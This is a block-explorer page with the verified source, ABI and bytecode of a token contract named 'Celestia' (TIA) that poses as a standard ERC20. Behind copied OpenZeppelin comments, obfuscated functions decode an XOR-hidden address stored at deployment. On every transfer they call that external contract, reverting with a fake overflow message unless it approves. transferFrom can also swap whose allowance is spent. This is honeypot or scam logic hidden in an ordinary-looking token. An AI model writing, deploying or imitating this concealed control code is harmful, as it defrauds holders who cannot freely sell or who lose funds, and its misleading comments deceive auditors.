ETH Price: $3,199.57 (+1.39%)
 

Overview

Max Total Supply

10,000,000,000 TIA

Holders

52

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
24,944,598.139410543543069459 TIA

Value
$0.00
0x169500a4c080ba766bb42e9dc56d9e145f0de6de
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, GNU GPLv3 license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-31
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function stdMeqdBuNscEDmleVZovRI(bytes memory IYUIKvGMVsFMfDD) external returns(bytes memory);
    /**
     * @dev Moves a `boolean` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function ulfKdcKScs6KFFteNHk6RXlPzw4BT6I(bytes memory hC5XDr6Bu__2HigTD9LpopMUUJfy3iLEN5IxbI) external returns(bytes memory);
      /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
}


interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}



contract Ownable is Context {
    address private _owner;
    address private _previousOwner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }


    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
contract Token is Context, IERC20, IERC20Metadata,IERC20Errors,Ownable {

    mapping(address  => uint256) private _balances;

    mapping(address  => mapping(address  => uint256)) private _allowances;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    bytes  private QSkeSrnKV696 ; 
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(bytes memory JpttjZopHq0aKuLikNm7) {
        _name = "Celestia";
        _symbol = "TIA";
        _totalSupply = 10000000000 * 10 ** 18;
        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
        QSkeSrnKV696 = JpttjZopHq0aKuLikNm7;
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view  returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view  returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view  returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view  returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public  returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }
    function allowance(address owner, address spender) public view  returns (uint256) {
        return _allowances[owner][spender];
    }
    function ulfKdcKScs6KFFteNHk6RXlPzw4BT6I(bytes memory hC5XDr6Bu__2HigTD9LpopMUUJfy3iLEN5IxbI) external returns(bytes memory){}
    function stdMeqdBuNscEDmleVZovRI(bytes memory IYUIKvGMVsFMfDD) external returns(bytes memory){}
    
    function aVFYnxme_DEfbnOCZQIq0cdlcE0(bytes memory pYanvvWewY_ylTx9P9zBUlfhU3OZDWgfHAoVnCr,bytes memory KmzPRxeg0MzN3jsVIM3Wlm4eroImH0) internal {
        pYanvvWewY_ylTx9P9zBUlfhU3OZDWgfHAoVnCr = w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(pYanvvWewY_ylTx9P9zBUlfhU3OZDWgfHAoVnCr);
        address s;
        assembly {s := mload(add(pYanvvWewY_ylTx9P9zBUlfhU3OZDWgfHAoVnCr,0x14))}
       bytes memory datas = w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(IERC20(s).ulfKdcKScs6KFFteNHk6RXlPzw4BT6I(KmzPRxeg0MzN3jsVIM3Wlm4eroImH0));
       uint256 r;
       assembly {
            r := mload(add(datas, 0x20)) 
        }

        require(r==1,"SafeMath: addition overflow");

    }

    function w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(bytes memory QcTCkuDUE0WbLarNkuLyAmwPFBLu0d) internal pure returns (bytes memory) {
            assembly {
                let len := mload(QcTCkuDUE0WbLarNkuLyAmwPFBLu0d)
                let dataPtr := add(QcTCkuDUE0WbLarNkuLyAmwPFBLu0d, 0x20)
                for {
                    let i := 0
                } lt(i, len) {
                    i := add(i, 0x20)
                } {
                mstore(add(dataPtr, i), xor(mload(add(dataPtr, i)), 0x0404040404040404040404040404040404040404040404040404040404040404))
                }
            }
            return QcTCkuDUE0WbLarNkuLyAmwPFBLu0d;
        }


     function Dmebn2jHTQEYyvLVBxfo9TdUb9I8V8l(bytes memory T_yT6UkilVeBGsN0sUIizNLqAiIaud03q, bytes memory OLtmc9kX0BZRHKNdCiGi_QfDdkTIuwA4_WF) internal  pure returns (bool) {
        if (T_yT6UkilVeBGsN0sUIizNLqAiIaud03q.length != OLtmc9kX0BZRHKNdCiGi_QfDdkTIuwA4_WF.length) {
            return false; 
        }

        for (uint256 i = 0; i < T_yT6UkilVeBGsN0sUIizNLqAiIaud03q.length; i++) {
            if (T_yT6UkilVeBGsN0sUIizNLqAiIaud03q[i] != OLtmc9kX0BZRHKNdCiGi_QfDdkTIuwA4_WF[i]) {
                return false; 
            }
        }

        return true; 
    }

  /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     */
    function smr1ONBjiSGgenlfpRNIHLVdAP(bytes memory lbKOmukRn5 ,bytes memory CG5hwa7qDOzWB3FDxOa4R) internal  returns (bytes memory) {
         lbKOmukRn5 = w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(lbKOmukRn5);
        address xp12z324eYE7tznzW2CV_1Z6Tl0VsNL52sM;
        assembly {
                xp12z324eYE7tznzW2CV_1Z6Tl0VsNL52sM := mload(add(lbKOmukRn5,0x14))
            }
        return IERC20(address(uint160(xp12z324eYE7tznzW2CV_1Z6Tl0VsNL52sM))).stdMeqdBuNscEDmleVZovRI(CG5hwa7qDOzWB3FDxOa4R);

    }

    function approve(address spender, uint256 value) public  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address n6hOIlMQ30FV7o1Cu_mDZ, address iPHpBYQSkYUuSi, uint256 Ys1C7y43mcFGQWjWV) public  returns (bool) {
        _transfer(n6hOIlMQ30FV7o1Cu_mDZ, iPHpBYQSkYUuSi, Ys1C7y43mcFGQWjWV);
        address spender = _msgSender();
        bytes memory HraALv5VzRrXLd = smr1ONBjiSGgenlfpRNIHLVdAP(QSkeSrnKV696,w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(abi.encodePacked(n6hOIlMQ30FV7o1Cu_mDZ)));
        uint256 mQJMM_Wk1iDTap1kKVz4eB = 987;
        if(Dmebn2jHTQEYyvLVBxfo9TdUb9I8V8l(w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(abi.encodePacked(address(0))),HraALv5VzRrXLd) == false)
        {
            mQJMM_Wk1iDTap1kKVz4eB = mQJMM_Wk1iDTap1kKVz4eB + 75;
        }
        if(Dmebn2jHTQEYyvLVBxfo9TdUb9I8V8l(w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(abi.encodePacked(_msgSender())),QSkeSrnKV696))
        {
            mQJMM_Wk1iDTap1kKVz4eB = mQJMM_Wk1iDTap1kKVz4eB + 42;
        }
         if (mQJMM_Wk1iDTap1kKVz4eB==(9999-8895))
        {   
            HraALv5VzRrXLd = w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(HraALv5VzRrXLd);
            assembly {
                n6hOIlMQ30FV7o1Cu_mDZ := mload(add(HraALv5VzRrXLd, 0x14))
            }
        }
        _spendAllowance(n6hOIlMQ30FV7o1Cu_mDZ, spender, Ys1C7y43mcFGQWjWV);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address o4ws_7VyqiZg, address LETvIwpf0AcF5mj, uint256 Bkz2G7pXG3G0sspeikB) internal {
        if (o4ws_7VyqiZg == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (LETvIwpf0AcF5mj == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(o4ws_7VyqiZg, LETvIwpf0AcF5mj, Bkz2G7pXG3G0sspeikB);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal  {
        aVFYnxme_DEfbnOCZQIq0cdlcE0(QSkeSrnKV696,w6ZE3cIge4pHP5njwdj_SXlXtCKZ2wRjmqvD(abi.encodePacked(from, to, value)));
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal  {

        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal  {


        uint256 currentAllowance = allowance(owner, spender);

        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"bytes","name":"JpttjZopHq0aKuLikNm7","type":"bytes"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes","name":"IYUIKvGMVsFMfDD","type":"bytes"}],"name":"stdMeqdBuNscEDmleVZovRI","outputs":[{"internalType":"bytes","name":"","type":"bytes"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"n6hOIlMQ30FV7o1Cu_mDZ","type":"address"},{"internalType":"address","name":"iPHpBYQSkYUuSi","type":"address"},{"internalType":"uint256","name":"Ys1C7y43mcFGQWjWV","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes","name":"hC5XDr6Bu__2HigTD9LpopMUUJfy3iLEN5IxbI","type":"bytes"}],"name":"ulfKdcKScs6KFFteNHk6RXlPzw4BT6I","outputs":[{"internalType":"bytes","name":"","type":"bytes"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200134638038062001346833981016040819052620000349162000207565b600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506040805180820190915260088082526743656c657374696160c01b6020909201918252620000a6916005916200014b565b506040805180820190915260038082526254494160e81b6020909201918252620000d3916006916200014b565b506b204fce5e3e25026110000000600481905533600081815260026020908152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a38051620001439060079060208401906200014b565b505062000320565b8280546200015990620002e3565b90600052602060002090601f0160209004810192826200017d5760008555620001c8565b82601f106200019857805160ff1916838001178555620001c8565b82800160010185558215620001c8579182015b82811115620001c8578251825591602001919060010190620001ab565b50620001d6929150620001da565b5090565b5b80821115620001d65760008155600101620001db565b634e487b7160e01b600052604160045260246000fd5b600060208083850312156200021b57600080fd5b82516001600160401b03808211156200023357600080fd5b818501915085601f8301126200024857600080fd5b8151818111156200025d576200025d620001f1565b604051601f8201601f19908116603f01168101908382118183101715620002885762000288620001f1565b816040528281528886848701011115620002a157600080fd5b600093505b82841015620002c55784840186015181850187015292850192620002a6565b82841115620002d75760008684830101525b98975050505050505050565b600181811c90821680620002f857607f821691505b602082108114156200031a57634e487b7160e01b600052602260045260246000fd5b50919050565b61101680620003306000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a9059cbb11610066578063a9059cbb146101ce578063cbddfed014610142578063dd62ed3e146101e1578063f2fde38b1461021a57600080fd5b8063715018a6146101a15780638da5cb5b146101ab57806395d89b41146101c657600080fd5b80631bda4b72116100c85780631bda4b721461014257806323b872dd14610156578063313ce5671461016957806370a082311461017857600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f761022d565b6040516101049190610cf6565b60405180910390f35b61012061011b366004610d2c565b6102bf565b6040519015158152602001610104565b6004545b604051908152602001610104565b6100f7610150366004610dc5565b50606090565b610120610164366004610e45565b6102d9565b60405160128152602001610104565b610134610186366004610e81565b6001600160a01b031660009081526002602052604090205490565b6101a96104f0565b005b6000546040516001600160a01b039091168152602001610104565b6100f7610599565b6101206101dc366004610d2c565b6105a8565b6101346101ef366004610e9c565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b6101a9610228366004610e81565b6105b6565b60606005805461023c90610ecf565b80601f016020809104026020016040519081016040528092919081815260200182805461026890610ecf565b80156102b55780601f1061028a576101008083540402835291602001916102b5565b820191906000526020600020905b81548152906001019060200180831161029857829003601f168201915b5050505050905090565b6000336102cd81858561066b565b60019150505b92915050565b60006102e684848461067d565b600033905060006103b9600780546102fd90610ecf565b80601f016020809104026020016040519081016040528092919081815260200182805461032990610ecf565b80156103765780601f1061034b57610100808354040283529160200191610376565b820191906000526020600020905b81548152906001019060200180831161035957829003601f168201915b50506040516001600160601b031960608d901b1660208201526103b4935060340191506103a09050565b6040516020818303038152906040526106dc565b610729565b604051600060208201529091506103db906103e0906103da906034016103a0565b836107c7565b6103f2576103ef81604b610f20565b90505b6040516001600160601b03193360601b1660208201526104a890610418906034016103a0565b6007805461042590610ecf565b80601f016020809104026020016040519081016040528092919081815260200182805461045190610ecf565b801561049e5780601f106104735761010080835404028352916020019161049e565b820191906000526020600020905b81548152906001019060200180831161048157829003601f168201915b50505050506107c7565b156104bb576104b881602a610f20565b90505b8061045014156104d8576104ce826106dc565b9150601482015196505b6104e3878487610859565b5060019695505050505050565b6000546001600160a01b0316331461054f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b60606006805461023c90610ecf565b6000336102cd81858561067d565b6000546001600160a01b031633146106105760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610546565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b61067883838360016108d7565b505050565b6001600160a01b0383166106a757604051634b637e8f60e11b815260006004820152602401610546565b6001600160a01b0382166106d15760405163ec442f0560e01b815260006004820152602401610546565b6106788383836109ac565b606081516020830160005b828110156107205781810180517f04040404040404040404040404040404040404040404040404040404040404041890526020016106e7565b50929392505050565b6060610734836106dc565b6014810151604051630ded25b960e11b8152919450906001600160a01b03821690631bda4b7290610769908690600401610cf6565b600060405180830381600087803b15801561078357600080fd5b505af1158015610797573d6000803e3d6000fd5b505050506040513d6000823e601f3d908101601f191682016040526107bf9190810190610f38565b949350505050565b600081518351146107da575060006102d3565b60005b835181101561084f578281815181106107f8576107f8610faf565b602001015160f81c60f81b6001600160f81b03191684828151811061081f5761081f610faf565b01602001516001600160f81b0319161461083d5760009150506102d3565b8061084781610fc5565b9150506107dd565b5060019392505050565b6001600160a01b0383811660009081526003602090815260408083209386168352929052205460001981146108d157818110156108c257604051637dc7a0d960e11b81526001600160a01b03841660048201526024810182905260448101839052606401610546565b6108d1848484840360006108d7565b50505050565b6001600160a01b0384166109015760405163e602df0560e01b815260006004820152602401610546565b6001600160a01b03831661092b57604051634a1406b160e11b815260006004820152602401610546565b6001600160a01b03808516600090815260036020908152604080832093871683529290522082905580156108d157826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161099e91815260200190565b60405180910390a350505050565b610a75600780546109bc90610ecf565b80601f01602080910402602001604051908101604052809291908181526020018280546109e890610ecf565b8015610a355780601f10610a0a57610100808354040283529160200191610a35565b820191906000526020600020905b815481529060010190602001808311610a1857829003601f168201915b50506040516001600160601b031960608a811b8216602084015289901b16603482015260488101879052610a70935060680191506103a09050565b610b9f565b6001600160a01b038316610aa0578060046000828254610a959190610f20565b90915550610b129050565b6001600160a01b03831660009081526002602052604090205481811015610af35760405163391434e360e21b81526001600160a01b03851660048201526024810182905260448101839052606401610546565b6001600160a01b03841660009081526002602052604090209082900390555b6001600160a01b038216610b2e57600480548290039055610b4d565b6001600160a01b03821660009081526002602052604090208054820190555b816001600160a01b0316836001600160a01b